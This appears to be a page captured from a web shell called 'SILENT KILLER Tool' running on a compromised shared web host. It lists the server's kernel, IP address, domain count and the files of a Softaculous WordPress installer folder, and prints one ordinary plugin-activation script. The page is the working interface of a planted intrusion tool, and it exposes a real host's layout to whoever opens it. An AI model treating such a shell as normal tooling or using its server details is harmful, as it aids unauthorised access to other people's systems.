Current Path: > > var > softaculous > wp57
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
images | Directory | - | - | |
languages | Directory | - | - | |
php53 | Directory | - | - | |
php56 | Directory | - | - | |
php71 | Directory | - | - | |
php81 | Directory | - | - | |
php82 | Directory | - | - | |
plugins | Directory | - | - | |
.htaccess | File | 482 bytes | December 23 2021 11:54:36. | |
_htaccess | File | 553 bytes | December 23 2021 11:54:36. | |
_index.php | File | 59 bytes | December 23 2021 11:54:36. | |
_wp-config.php | File | 3052 bytes | December 23 2021 11:54:36. | |
add_user.php | File | 461 bytes | December 23 2021 11:54:36. | |
backup.php | File | 3107 bytes | August 11 2025 12:13:02. | |
check_charset.php | File | 2067 bytes | December 23 2021 11:54:36. | |
clone.php | File | 31694 bytes | August 11 2025 12:13:02. | |
clone.xml | File | 497 bytes | December 23 2021 11:54:36. | |
edit.php | File | 9680 bytes | August 11 2025 12:13:02. | |
edit.xml | File | 1801 bytes | October 03 2023 08:59:48. | |
extend.php | File | 84938 bytes | August 11 2025 12:13:02. | |
fileindex.php | File | 291 bytes | December 23 2021 11:54:36. | |
import.php | File | 6673 bytes | August 11 2025 12:13:02. | |
info.xml | File | 15268 bytes | August 11 2025 06:37:52. | |
install.js | File | 1493 bytes | January 03 2025 13:25:20. | |
install.php | File | 32242 bytes | August 11 2025 12:13:02. | |
install.xml | File | 5765 bytes | February 24 2025 07:15:58. | |
md5 | File | 8080 bytes | August 11 2025 12:13:02. | |
multisite.sql | File | 37127 bytes | August 11 2025 06:37:52. | |
notes.txt | File | 5999 bytes | August 11 2025 06:37:52. | |
plugin_activate.php | File | 596 bytes | December 23 2021 11:54:36. | |
plugin_deactivate.php | File | 613 bytes | December 23 2021 11:54:36. | |
sign_on.php | File | 3359 bytes | January 28 2025 09:14:58. | |
soft.htaccess | File | 127 bytes | December 23 2021 11:54:36. | |
upgrade.php | File | 13891 bytes | August 11 2025 12:13:02. | |
upgrade.xml | File | 1611 bytes | October 03 2023 08:59:48. | |
wp-config.php | File | 2768 bytes | December 23 2021 11:54:36. | |
wp57.sql | File | 30126 bytes | August 11 2025 06:37:52. | |
wp57.zip | File | 17319174 bytes | August 11 2025 06:37:52. |
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } require_once('wp-blog-header.php'); require_once('wp-includes/pluggable.php'); require_once('wp-admin/includes/plugin.php'); $plugins_to_activate = '[[plugins_to_activate]]'; $plugins_to_activate = unserialize($plugins_to_activate); $ret = array(); foreach($plugins_to_activate as $plugn_file){ // null means success $ret[$plugn_file] = activate_plugin($plugn_file); } echo '<plugin_activate>'.serialize($ret).'</plugin_activate>'; exit(0);
SILENT KILLER Tool